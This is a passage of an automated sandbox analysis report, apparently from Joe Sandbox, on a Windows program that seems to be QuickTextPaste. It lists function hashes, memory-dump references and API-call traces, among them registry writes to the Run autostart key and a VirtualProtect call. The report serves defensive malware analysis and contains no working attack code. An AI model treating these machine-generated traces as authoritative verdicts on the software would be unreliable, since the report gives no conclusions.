                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0bca1585cefe786a1ff3cc68e3c38d382c99e7e441ff654cef27ed62ce7ce23d
                                                                                                      • Instruction ID: 29f8b912386a656dd0082087da7d3764f38c9a020ac6b572d474ce0e001aafa7
                                                                                                      • Opcode Fuzzy Hash: 0bca1585cefe786a1ff3cc68e3c38d382c99e7e441ff654cef27ed62ce7ce23d
                                                                                                      • Instruction Fuzzy Hash: 08F14B71E056688BEB24CB15CC90BEAB7B5FB84300F1481EAD40DA7681D6789FD28F56
                                                                                                      Function 0040D3FD Relevance: .3, Instructions: 323COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 21ddbd0ade1c6ef064c047421e4ceafdc0df0687175865a02a8e5744d0e27d81
                                                                                                      • Instruction ID: ba0e7830f34d5d473e3d8a47f5e89b558e8abff779216f57f9e28479b2f66594
                                                                                                      • Opcode Fuzzy Hash: 21ddbd0ade1c6ef064c047421e4ceafdc0df0687175865a02a8e5744d0e27d81
                                                                                                      • Instruction Fuzzy Hash: B8D170B1D042689FDB24CB54CC90BEAB7B5EB85305F1481FAD84D67281D638AEC6CF85
                                                                                                      Function 0041A1FF Relevance: .3, Instructions: 280COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2f962d481ceb7026f54bdbfd6506998ef6fc37a62566caafbfdba534edd490cf
                                                                                                      • Instruction ID: c2b164ba285e202c0e83407ed2c28f74c7164d80e935945182e51b8450cd585f
                                                                                                      • Opcode Fuzzy Hash: 2f962d481ceb7026f54bdbfd6506998ef6fc37a62566caafbfdba534edd490cf
                                                                                                      • Instruction Fuzzy Hash: 5DA1E3B2E111648BE7248B15DC44BEAB776EF90710F0481FAE50DA7680E67D4EC5CB16
                                                                                                      Function 00410466 Relevance: .2, Instructions: 229COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 80df335f511795bf1785b4f9e3aaa076666f7a1809648cd02d809322b1d848f6
                                                                                                      • Instruction ID: 52fd85eb0be26a379dfec9f4bd644b8906e6b61f0b077be6a183fff9edbb0b27
                                                                                                      • Opcode Fuzzy Hash: 80df335f511795bf1785b4f9e3aaa076666f7a1809648cd02d809322b1d848f6
                                                                                                      • Instruction Fuzzy Hash: D981F0B2D14129DAEB248B20DC85BFA7775EF44300F1441FAE94996681E27C5EC2CF66
                                                                                                      Function 0040F063 Relevance: .2, Instructions: 217COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 45aba0cb01d6de339383c509fc8dcc2a0ded021fc4a657e4136a11d982beda2d
                                                                                                      • Instruction ID: c5383fdba27e41dd3188cfddf230cc5b12f9f984f496d5de91df96c77ba249cb
                                                                                                      • Opcode Fuzzy Hash: 45aba0cb01d6de339383c509fc8dcc2a0ded021fc4a657e4136a11d982beda2d
                                                                                                      • Instruction Fuzzy Hash: 9281CEB2D041289BEB348B65DC44AEAB775EFC4310F1482FBE80D66A80D7795EC68F51
                                                                                                      Function 0040F2E0 Relevance: .2, Instructions: 192COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1da7b4eca4dd0b3bcb2928ab1b50701c41341ced278fff1fe6075873ff2fb17e
                                                                                                      • Instruction ID: e4de6c31e7dd7d9ae7cbf453cefeab567a34255e6033d7142046d2543e7a457b
                                                                                                      • Opcode Fuzzy Hash: 1da7b4eca4dd0b3bcb2928ab1b50701c41341ced278fff1fe6075873ff2fb17e
                                                                                                      • Instruction Fuzzy Hash: 60718DB6D141288BEB34CA25DC94AEAB775EB84310F1482FAD80D67A80D7385EC68F55
                                                                                                      Function 0040F106 Relevance: .2, Instructions: 151COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0067446df2b841d55b74590cfd51bbe3e55343587a17c72adcc9b4a7a71961ca
                                                                                                      • Instruction ID: 6968dfc914d23c42c506df70806023ce6e3158a3bf4cdd7dc5e6441b1a5d4f75
                                                                                                      • Opcode Fuzzy Hash: 0067446df2b841d55b74590cfd51bbe3e55343587a17c72adcc9b4a7a71961ca
                                                                                                      • Instruction Fuzzy Hash: 5F51B0B2E141189BEB348F65DC446EAB775EFC4310F1582FBE80D67A84D6385AC68F11
                                                                                                      Function 0040801F Relevance: .1, Instructions: 120COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 756ba44b591ab78ec537064f37634aa87b3f629cbb3a6d94e554b57638147a44
                                                                                                      • Instruction ID: c60907c53099bf654c10073f120cbf17372f3fe14946ac000e613784148a9d14
                                                                                                      • Opcode Fuzzy Hash: 756ba44b591ab78ec537064f37634aa87b3f629cbb3a6d94e554b57638147a44
                                                                                                      • Instruction Fuzzy Hash: 6C4183A1E1466496EB10CB60DC517DB6235EFA4300F1851FED50DEB390EA3F8E86CB5A
                                                                                                      Function 00423797 Relevance: 96.7, APIs: 52, Strings: 3, Instructions: 423windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 0042379C
                                                                                                      • LoadStringW.USER32(0000006D,?,00000080,00000000), ref: 004237D5
                                                                                                        • Part of subcall function 0043754D: GetModuleHandleW.KERNEL32(00000000), ref: 0043755B
                                                                                                        • Part of subcall function 0043754D: RegOpenKeyW.ADVAPI32(-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 004375F7
                                                                                                        • Part of subcall function 0043754D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 00437620
                                                                                                        • Part of subcall function 0043754D: lstrlenW.KERNEL32(?), ref: 0043764A
                                                                                                        • Part of subcall function 0043754D: RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 00437662
                                                                                                      • CreatePopupMenu.USER32 ref: 004237F5
                                                                                                      • CreatePopupMenu.USER32 ref: 004237F9
                                                                                                      • AppendMenuW.USER32(00000000,00000400,00000002,00000000), ref: 00423817
                                                                                                      • AppendMenuW.USER32(00000000,00000400,00000006,00000000), ref: 00423826
                                                                                                      • AppendMenuW.USER32(00000000,00000400,0000007A,00000000), ref: 00423835
                                                                                                      • AppendMenuW.USER32(00000000,00000C00,00000000,00000000), ref: 00423840
                                                                                                      • AppendMenuW.USER32(00000000,00000400,00000003,00000000), ref: 0042384F
                                                                                                      • AppendMenuW.USER32(00000000,00000400,00000004,00000000), ref: 0042385E
                                                                                                      • AppendMenuW.USER32(00000000,00000C00,00000000,00000000), ref: 00423866
                                                                                                      • AppendMenuW.USER32(00000000,00000400,00000007,00000000), ref: 00423875
                                                                                                      • AppendMenuW.USER32(00000000,00000C00,00000000,00000000), ref: 0042387D
                                                                                                      • AppendMenuW.USER32(00000000,00000410,?,00000000), ref: 00423892
                                                                                                      • AppendMenuW.USER32(?,00000400,00000458,00000000), ref: 004238A7
                                                                                                      • AppendMenuW.USER32(?,00000400,00000459,00000000), ref: 004238BC
                                                                                                      • CreatePopupMenu.USER32 ref: 004238BE
                                                                                                      • AppendMenuW.USER32(00000000,00000410,?,00000000), ref: 004238DB
                                                                                                      • AppendMenuW.USER32(?,00000400,000007D0,00000000), ref: 004238F0
                                                                                                      • AppendMenuW.USER32(?,00000400,000007D1,00000000), ref: 00423905
                                                                                                      • AppendMenuW.USER32(?,00000400,000007D2,00000000), ref: 0042391A
                                                                                                      • AppendMenuW.USER32(?,00000C00,00000000,00000000), ref: 00423925
                                                                                                      • AppendMenuW.USER32(?,00000400,00000BB8,00000000), ref: 0042393A
                                                                                                      • AppendMenuW.USER32(?,00000C00,00000000,00000000), ref: 00423945
                                                                                                      • AppendMenuW.USER32(?,00000400,00000BB9,00000000), ref: 0042395A
                                                                                                      • AppendMenuW.USER32(?,00000400,00000BBA,00000000), ref: 0042396F
                                                                                                      • AppendMenuW.USER32(?,00000C00,00000000,00000000), ref: 0042397A
                                                                                                      • AppendMenuW.USER32(?,00000400,0000045A,FAQ), ref: 0042398B
                                                                                                      • AppendMenuW.USER32(00000000,00000400,0000045B,00000000), ref: 0042399D
                                                                                                      • CreatePopupMenu.USER32 ref: 0042399F
                                                                                                      • AppendMenuW.USER32(00000000,00000410,?,00000000), ref: 004239BC
                                                                                                      • AppendMenuW.USER32(?,00000401,00000FA0,00000000), ref: 004239D5
                                                                                                      • AppendMenuW.USER32(?,00000C00,00000000,00000000), ref: 004239E0
                                                                                                      • AppendMenuW.USER32(?,00000400,00000FA1,00000000), ref: 004239F5
                                                                                                      • AppendMenuW.USER32(?,00000400,00000FA2,00000000), ref: 00423A0A
                                                                                                      • AppendMenuW.USER32(?,00000400,00000FA3,00000000), ref: 00423A1F
                                                                                                      • AppendMenuW.USER32(?,00000C00,00000000,00000000), ref: 00423A2A
                                                                                                      • AppendMenuW.USER32(?,00000400,00000FA4,00000000), ref: 00423A3F
                                                                                                      • AppendMenuW.USER32(?,00000C00,00000000,00000000), ref: 00423A4A
                                                                                                      • AppendMenuW.USER32(?,00000400,0000045D,00000000), ref: 00423A5F
                                                                                                      • AppendMenuW.USER32(?,00000400,0000045E,00000000), ref: 00423A77
                                                                                                      • AppendMenuW.USER32(?,00000C00,00000000,00000000), ref: 00423A82
                                                                                                      • AppendMenuW.USER32(?,00000400,00000FA5,FAQ), ref: 00423A93
                                                                                                      • AppendMenuW.USER32(00000000,00000C00,00000000,00000000), ref: 00423A9B
                                                                                                      • AppendMenuW.USER32(00000000,00000400,0000ABE0,00000000), ref: 00423AB0
                                                                                                        • Part of subcall function 00407444: VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      • AppendMenuW.USER32(00000000,00000400,0000ABE3,00000000), ref: 00423B34
                                                                                                      • AppendMenuW.USER32(00000000,00000C00,00000000,00000000), ref: 00423B89
                                                                                                      • AppendMenuW.USER32(00000000,00000400,00003200,00000000), ref: 00423B9B
                                                                                                        • Part of subcall function 00427C1A: __EH_prolog.LIBCMT ref: 00427C1F
                                                                                                        • Part of subcall function 00427C1A: RegSetValueExW.ADVAPI32(?,_________ADMIN_TEST_SoftwareOK_DOK,00000000,00000004,00000BEC,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020006,00000400,75AE10E0,?,?,00423BA6), ref: 00427C75
                                                                                                        • Part of subcall function 00427C1A: RegCloseKey.ADVAPI32(?,?,?,00423BA6), ref: 00427C8D
                                                                                                      • AppendMenuW.USER32(00000000,00000400,00003204,00000000), ref: 00423BCD
                                                                                                      • AppendMenuW.USER32(00000000,00000400,00003202,00000000), ref: 00423BDF
                                                                                                      • AppendMenuW.USER32(00000000,00000C00,00000000,00000000), ref: 00423BE7
                                                                                                      • AppendMenuW.USER32(00000000,00000400,0000045C,QuickTextPaste.ini), ref: 00423BF5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
